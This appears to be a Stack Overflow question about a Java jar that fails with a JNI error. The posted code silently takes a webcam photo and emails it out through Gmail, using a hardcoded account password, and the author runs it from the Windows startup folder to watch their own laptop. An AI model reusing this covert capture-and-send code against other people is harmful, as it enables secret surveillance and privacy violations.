# cannot run .jar file

Tags: java, jar

I am trying to make a jar file from the following code:

```
public class Main {

    public static void main(String[] args) {

        boolean net = true;
        int num = 0;

        do {
            if (netIsAvailable()) {
                webCapture();
                mailSend();
                net = false;
            }

        } while (net);

        System.exit(0);

    }

    public static void webCapture() {
        // get default webcam and open it
        Webcam webcam = Webcam.getDefault();

        webcam.setViewSize(new Dimension(640, 480));

        // creates test2.jpg
        WebcamUtils.capture(webcam, "test2", "jpg");
    }

    private static boolean netIsAvailable() {
        try {
            final URL url = new URL("http://www.google.com");
            final URLConnection conn = url.openConnection();
            conn.connect();
            return true;
        } catch (MalformedURLException e) {
            throw new RuntimeException(e);
        } catch (IOException e) {
            return false;
        }
    }

    public static void mailSend() {
        final String username = "javaMailTest002@gmail.com";
        final String password = "anaaremere";

        Properties props = new Properties();
        props.put("mail.smtp.auth", "true");
        props.put("mail.smtp.starttls.enable", "true");
        props.put("mail.smtp.host", "smtp.gmail.com");
        props.put("mail.smtp.port", "587");

        Session session = Session.getInstance(props,
                new javax.mail.Authenticator() {
                    protected PasswordAuthentication getPasswordAuthentication() {
                        return new PasswordAuthentication(username, password);
                    }
                });

        try {

            Message message = new MimeMessage(session);
            message.setFrom(new InternetAddress(username));
            message.setRecipients(Message.RecipientType.TO,
                    InternetAddress.parse("alindradici@gmail.com"));
            message.setSubject("Your computer has been accessed");
            message.setText("Congratulation!");

            MimeBodyPart messageBodyPart = new MimeBodyPart();

            Multipart multipart = new MimeMultipart();

            messageBodyPart = new MimeBodyPart();
            String file = "C:\\Fast\\JDBCDemoApp\\webCamSpy\\test2.jpg";
            String fileName = "attachmentName";
            DataSource source = new FileDataSource(file);
            messageBodyPart.setDataHandler(new DataHandler(source));
            messageBodyPart.setFileName(fileName);
            multipart.addBodyPart(messageBodyPart);

            message.setContent(multipart);

            Transport.send(message);

            System.out.println("done, email sent ok");

        } catch (Exception e) {
            System.out.println("Email sending problems");
            e.printStackTrace();


        }
    }

}
```

Works fine,compiles and runs without problems,but when i do:
File | Project Structure | Artifacts click the plus icon and create new artifact choose --> jar --> From modules with dependencies.

Build | Build artifacts
and when i try to run the new created jar file I get the error:a jni error has occurred please check your installation and try again . Any idea how to solve this?

Comment: It might have to do something with the ide you're using. Why not run it through command line/terminal?

Comment: Which IDE are you using?

Comment: Not all jars are created runnable. A runnable Java must have a MAINIFEST.MF that specifies the main class. Telling us what IDE this is you are using might give us some clues.

Comment: Are you made a runnable jar? Have you possibly just compiles it as a library.

Comment: I'm using Intelij idea, and I made runnable jar files before

Comment: It gets even weirder,when I try to compile my .java file from command line I get tons of errors, like it doesn't recognize any imports

Answer (score 1):

What are you doing to run the jar?

From command-line: `java -jar name_of_your_created.jar`

Comment: I made the app to see who is using my laptop in my absence , so i made a shortcut of the jar and put it in the windows startup folder to run at windows startup

Comment: But i tried it with different jar and it works like a charm

Comment: I did it with eclipse